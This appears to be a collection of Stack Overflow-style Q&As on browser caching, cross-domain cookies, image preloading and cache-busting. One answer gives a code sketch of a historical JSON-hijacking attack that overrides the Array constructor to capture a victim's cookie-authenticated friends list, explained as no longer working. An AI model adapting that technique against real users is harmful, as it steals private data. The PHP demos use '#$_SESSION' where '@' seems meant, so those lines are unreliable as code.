How can I cache static JavaScript files on www.foo.ru from www.abc.ru?
I tried loading them via a script tag (setting the src attribute), but when I go to www.abc.ru the requests are sent again; the cache is ignored. Does the browser separate its cache by origin, or is something else going on?
As Terry said in a comment, you can't do that directly. It used to be possible, but it was an information leak (http://malicious-site-example.com could see that it gets a really fast response to http://example.com/some-asset and use that information [probably in combination with other similar heuristics] to infer that you've been on http://example.com lately). So now, the cached response is only used for the origin that originally requested it — that is, effectively different origins have different caches.
Presumably you only want to do this on a pair of sites where you control both of them. In that case, you might use an iframe on foo.ru's page that directly loads a page from abc.ru that does the load. Then it's abc.ru that's doing the request, and it's cached such that it's connected to abc.ru, not foo.ru. You can hide the iframe by making it zero-height or off the page or similar.
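A minimal sketch of that iframe approach, assuming you control both sites (the priming-page URL is hypothetical):
// on foo.ru's page: load a hidden "priming" page from abc.ru; the assets
// that page requests get cached under abc.ru's origin
var frame = document.createElement("iframe");
frame.src = "https://www.abc.ru/prime-cache.html"; // a page that loads the shared scripts
frame.style.display = "none";                      // or zero-height / off-screen
document.body.appendChild(frame);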
Related
One of the earliest hacks of a major social website (using an old browser) was:
log in to the site, so you have a session cookie
create a script tag whose src references the "get friends list" URL
override the Array constructor via JS
Since the <script> tag does send cookies, the request is authenticated and the response is pure JSON (not runnable on its own), but because we overrode the Array constructor, we can capture the data. A sketch follows below.
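A minimal sketch of that historical attack, for illustration only. Modern engines no longer build array literals through a user-defined Array constructor, so this no longer works; the friends-list URL is hypothetical.
var captured = [];
// override the Array constructor; in the affected old engines, the array
// literals in the evaluated JSON response were built through it
window.Array = function () {
    for (var i = 0; i < 100; i++) {
        // a setter per numeric index captures each element as it is assigned
        this.__defineSetter__(String(i), function (value) {
            captured.push(value);
        });
    }
};
// the <script> tag sends the victim's cookies, so the evaluated response
// is the authenticated friends list
var s = document.createElement("script");
s.src = "http://social-site.example/get-friends-list";
document.body.appendChild(s);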
That's fine (that was a preamble to my question).
Question
What is the complete list of elements that also send cookies on a cross-domain request?
Wouldn't it be more accurate to say that any resource the browser requests from a given domain has that domain's cookies attached to the request? So really, any element that loads a resource from a server causes cookies to be sent. That would include images, JSON files, HTML/PHP files, external CSS files, and probably web fonts. This is one of the reasons you might want to host your resources (scripts, CSS files, images) on a separate cookieless domain, as an optimisation.
This JSFiddle is mostly a proof that CSS files can "remember".
HTML
<link href="remember.php?.css" rel="stylesheet"/>
<a href="#" id="red">Remember Red</a>
Javascript
red.onclick = function (e) {
    // loading this URL as an "image" just fires a GET that carries the session cookie
    var img = new Image();
    img.src = "remember.php?col=red";
    return false;
};
remember.php
if(isset($_GET["col"])){
$_SESSION["fav_color"]=$_GET["col"];
}
echo "body {
color:".htmlentities(#$_SESSION["fav_color"] ?: "blue")."
}";
So what should happen is that when we load an image with the URI remember.php?col=red, the server will remember that color value even after a refresh. The same principle applies to images and, I would assume, web fonts.
Another example is images, which should also send cookies when loaded. (Though, for example, stackoverflow.com hosts its images on another domain; in this case the layout stuff is on cdn.sstatic.net/stackoverflow/img/sprites.png.) And even if cookies were sent, we wouldn't normally know unless the cookie affects the image somehow. But if we check with the developer tools, we can see that cookies do get sent. For example:
An image hosted on php.net
Same image on a different domain
As you can see, the cookies do get sent, even cross-domain. As further proof, here is the remember.php demo, but with images.
Demo
HTML
<img src="http://mfirdaus.net/random/so/remember_image.php"/>
<a href="#" id="toggle">Toggle Image</a>
Javascript
toggle.onclick = function () {
    // hit the toggle URL (cookies included); the server die()s without image
    // data, so onerror fires and we reload the page to show the other image
    var img = new Image();
    img.src = "http://mfirdaus.net/random/so/remember_image.php?toggle";
    img.onerror = function () {
        window.location = window.location;
    };
    return false;
};
remember_image.php
if(isset($_GET["toggle"])){
$_SESSION["like_cats"]=!#$_SESSION["like_cats"];
die();
}
echo file_get_contents(#$_SESSION["like_cats"] ? "cat.jpeg" : "duck.jpeg" );
In this demo the cookie does affect the image, hence it's easier to tell that cookies get sent with image requests.
Now, whether this resource contains privileged data (such as the JSON that contains the friends list), and whether the page calling this resource can actually use that privileged data (in this case, by doing magic JavaScript stuff to exploit the JSON), is another matter. Browsers should be safe enough that most of the obvious vectors are secured. We can't even read another domain's images after putting them in a canvas, due to security. But of course there will be those pesky bugs and exploits for browser vendors to deal with.
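For example, that canvas restriction looks like this (a sketch; the image URL is a placeholder):
var img = new Image();
img.onload = function () {
    var canvas = document.createElement("canvas");
    canvas.width = img.width;
    canvas.height = img.height;
    var ctx = canvas.getContext("2d");
    ctx.drawImage(img, 0, 0);         // allowed: we can still display it
    try {
        ctx.getImageData(0, 0, 1, 1); // throws: the canvas is now tainted
    } catch (e) {
        console.log("blocked: " + e.name); // "SecurityError"
    }
};
img.src = "http://other-domain.example/photo.jpg";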
I used to use the fact that cookies are sent cross-domain to make a Firefox extension that scraped authenticated pages of a website to show a sidebar with parsed data, because AJAX in Firefox extensions doesn't have the same-domain restrictions that normal pages do, and I didn't have to do anything special to authenticate because the AJAX requests send the cookies as one would expect.
I'm currently trying to preload images for a webpage I'm creating, as those images are quite big.
Currently I know (thanks to another post here) how to preload the images via JavaScript and then display them in a canvas.
BUT whenever I switch pages, the preloaded images need to be preloaded again; they are not cached.
So my question is: Is there any possibility to cache these images?
(or is it even best to put them into a session variable?)
The images themselves are quite big, up to 1.5 MB each (there are 20 images alone in the part that already exists, and preloading them takes about 4 seconds).
Some info, if necessary:
I'm using an Apache server and PHP as the primary language, with JavaScript in a supporting role.
Edit:
As I forgot to mention it: the web server I will finally host the site on is an external one (a hosting provider), so I won't be able to edit the web server settings there.
If the images don't change, try something like this in .htaccess:
# Set caching on image files for 11 months (requires mod_expires and mod_headers)
<filesMatch "\.(ico|gif|jpg|png)$">
ExpiresActive On
ExpiresDefault "access plus 11 months"
Header append Cache-Control "public"
</filesMatch>
If you think this is not the right approach, e.g. because the images may change, just eager-load the images right when the page hits (warning: definitely a hack):
(function () {
    // hidden container so the images load (and get cached) without being seen
    var hiddenCache = document.createElement("div");
    hiddenCache.style.display = "none";
    document.body.appendChild(hiddenCache);
    // myEagerLoadedImageUrls is your array of image URLs;
    // use a plain for loop instead of forEach if you must support ECMAScript 3
    myEagerLoadedImageUrls.forEach(function (urlStr) {
        var hiddenImg = document.createElement("img");
        hiddenImg.src = urlStr;
        hiddenCache.appendChild(hiddenImg);
    });
})();
The browser already caches images in its memory and/or disk cache, as long as the headers coming from the server don't tell it to avoid caching. The browser cache endures across page loads. So, if your images were loaded once on the first page, they should already be in the browser cache for the second page; when requested there, they should load locally rather than be fetched over the internet.
If you're looking for client-side code that can be used to preload images, there are many examples:
How do you cache an image in Javascript
Image preloader javascript that supports events
Is there a way to load images to user's cache asynchronously?
FYI, it is possible in newer browsers to use a combination of Local Storage and data URIs to implement your own image caching, but I'd be surprised if there was any real-world situation where that was required, and if you have a lot of images, you may run into Local Storage's size limits sooner than the browser cache's.
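For completeness, a minimal sketch of that Local Storage approach (the cache-key scheme and helper name are my own, not any particular library's):
function cacheImage(url) {
    var cached = localStorage.getItem("img:" + url);
    if (cached) {
        return Promise.resolve(cached); // already stored as a data URI
    }
    return fetch(url)
        .then(function (response) { return response.blob(); })
        .then(function (blob) {
            return new Promise(function (resolve) {
                var reader = new FileReader();
                reader.onload = function () {
                    try {
                        localStorage.setItem("img:" + url, reader.result);
                    } catch (e) {
                        // quota exceeded -- just use the result without storing it
                    }
                    resolve(reader.result);
                };
                reader.readAsDataURL(blob); // blob -> data URI
            });
        });
}
// usage: cacheImage("big-photo.jpg").then(function (src) { someImg.src = src; });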
I have a Javascript library I'm working on. It can be self-hosted or run from another server. The script makes a number of AJAX calls and the preferred method is making POST requests to the same host as the including page. To allow for cross-domain calls it also supports JSONP, but this limits the amount of data that can be sent (~2K to safely accommodate most modern browsers' URL length limits).
Obviously the user including the script knows where they're getting it from and could manually select JSONP as needed, but in the interest of simplifying things, I'd like to detect, within the script itself, whether the script was loaded from the same host as the page including it or not.
I'm able to grab the script element with jQuery but doing a $('script').attr('src') is only returning a relative path (e.g. "/js/my-script.js" not "http://hostname.com/js/my-script.js") even when it's being loaded from a different host.
Is this possible and if so, how would I go about it?
Thanks in advance.
Don't use JSONP, use CORS headers.
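For instance, a minimal Node.js sketch of a server sending CORS headers so cross-origin requests work without JSONP (the allowed origin and port are placeholders):
var http = require("http");
http.createServer(function (req, res) {
    // allow the including page's origin to read this response
    res.setHeader("Access-Control-Allow-Origin", "https://www.example.com");
    res.setHeader("Access-Control-Allow-Methods", "GET, POST");
    res.end(JSON.stringify({ ok: true }));
}).listen(8080);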
But if you really want to do the check in JS, use var t = $('script')[0].outerHTML.
Effect on my page:
[20:43:34.865] "<script src="http://www.google-analytics.com/ga.js" async="" type="text/javascript"></script>"
Checking location.host should do the trick.
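For example, a sketch that resolves the script's own src to an absolute URL and compares hosts (document.currentScript requires a reasonably modern browser; the fallback grabs the last script in the document, which is the including tag while the script runs synchronously):
var script = document.currentScript ||
             document.scripts[document.scripts.length - 1];
var a = document.createElement("a");
a.href = script.src; // the browser resolves relative paths here
var sameHost = (a.host === location.host);
// sameHost ? POST to the same origin : fall back to JSONP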
I'm writing a JavaScript application in which I want to create my own cache management.
Now my question is: is there any bottleneck in JavaScript (e.g. an event on the window object) that we can hook in order to handle and modify all server communications?
Many tags in the page can request a resource from the server, e.g. img, link, script.
In other words, I want a bottleneck in JavaScript where I can be notified that a resource has been requested from the server. Then I will look into my cache system and serve the resource either from my cache or by downloading the content from a generic HTTP handler on my server.
I know it's a bit of a strange requirement, but because I believe JavaScript is very flexible, I thought this "bottleneck" might exist.
Thank you.
One way to lazy-load resources is to set a common source (e.g. 1.gif for images, x.txt for scripts/CSS) pointing at a small, cacheable resource, then set a data attribute on the element with the actual path to the content.
<img src="/1.gif" data-url="/images/puppies.png" class="onhold" />
Finally, on DOM-ready or document load, you can run your logic to set the proper URLs, replace DOM elements, etc. Using jQuery you'd do something like this:
jQuery(document).ready(function ($) {
    $("img.onhold").each(function () {
        var img = $(this),
            url = img.data("url");
        // any logic to update url based on cache, CDN, etc. here
        img.attr("src", url);
    });
});
I've been learning JavaScript recently, and I've seen a number of examples (Facebook.com, the Readability bookmarklet) that use Math.random() to append a value to links.
What problem does this solve? An example parameter from the Readability bookmarklet:
_readability_script.src='http://lab.arc90.com/....script.js?x='+(Math.random());
Are there collisions or something in JavaScript that this is sorting out?
As Rubens says, it's a trick typically employed to prevent caching. Browsers cache JavaScript and CSS very aggressively, which can save you bandwidth, but can also cause deployment problems when changing your scripts.
The idea is that browsers will consider the resource located at http://www.example.com/something.js?foo different from http://www.example.com/something.js?bar, and so won't use their local cache to retrieve the resource.
Probably a more common pattern is to append an incrementing value which can be altered whenever the resource needs to change. In this way, you benefit by having repeat requests served by the client-side cache, but when deploying a new version, you can force the browser to fetch the new version.
Personally, I like to append the last-modified time of the file as a Unix timestamp, so I don't have to go hunting around and bumping version numbers whenever I change the file. A sketch of the idea follows.
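A minimal Node.js sketch of that timestamp trick (the file paths are assumptions):
var fs = require("fs");
function scriptTag(urlPath) {
    // last-modified time of the file on disk, as a Unix timestamp
    var mtime = fs.statSync("public" + urlPath).mtime;
    var version = Math.floor(mtime.getTime() / 1000);
    return '<script src="' + urlPath + '?v=' + version + '"></script>';
}
console.log(scriptTag("/js/app.js"));
// -> <script src="/js/app.js?v=1700000000"></script> (the number will vary)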
The main point is to keep the browser from caching those resources.
This ensures the request URL is unique, so the script will not be cached as a static resource, since the query string changes each time.
This is because Internet Explorer likes to cache everything, including requests issued via JavaScript code.
Another way to do this, without random numbers in the URL, is to add Cache-Control headers to the directories with the items you don't want cached:
# .htaccess
Header set Cache-Control "no-cache"
Header set Pragma "no-cache"
Most browsers respect Cache-Control, but IE (including 7; I haven't tested 8) only acknowledges the Pragma header.
Depending on how the browser chooses to interpret a resource's caching hints, you might not get the desired effect just by asking the browser to re-fetch a URL it has previously used. (Most mouse-over image buttons rely on the fact that the browser will reuse the cached resource, for speed.)
When you want to make sure the browser gets a fresh copy of a resource (like a dynamic stock-ticker image), you force it to think the content is new by appending the date/time, an ever-increasing number, or random garbage.
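For example (a sketch; the element id and image name are placeholders):
// force a fresh fetch each time by making the URL unique
var ticker = document.getElementById("stock-ticker");
ticker.src = "ticker.png?t=" + new Date().getTime();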
There is a tool called Squid that can cache web pages between the client and the server. Using a random number guarantees that a request will not be cached by an intermediary like this. Even with Header set Cache-Control "no-cache", you may still need to add a random number to get through something like Squid.